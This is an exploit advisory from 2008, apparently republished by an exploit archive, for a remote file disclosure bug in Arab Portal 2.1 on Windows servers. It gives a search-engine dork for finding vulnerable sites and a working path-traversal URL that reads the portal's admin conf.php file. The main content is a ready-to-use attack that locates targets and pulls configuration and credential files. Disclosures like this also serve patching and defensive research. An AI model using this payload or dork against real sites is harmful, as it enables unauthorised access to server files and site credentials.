id: 4094
date: 11/06/2008
title: Arab Portal 2.1 Remote File Disclosure Vulnerability (win only)
author: IRCRASH
cves: 

===============================================================
Arab Portal 2.1 Remote File Disclosure Vulnerability (win only)
===============================================================


#####################################################################################
####                Arab Portal v2.1 Remote File Disclosure (Win32)              ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #                                                    #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
#####################################################################################
#                                                                                   #
#Download : www.arabportal.net                                                      #
#                                                                                   #
#DORK : Powered by:   Arab Portal  inurl:mod.php?mod=html                           #
#                                                                                   #
#####################################################################################
#                                       [Bug]                                       #
#                                                                                   #
#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\File.Type                 #
#                                                                                   #
#Config File :                                                                      #
#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php      #
#                                                                                   #
#Note : This bug only work on windows servers .                                     #
#                                                                                   #
#####################################################################################



#  0day.today [2023-03-26]  #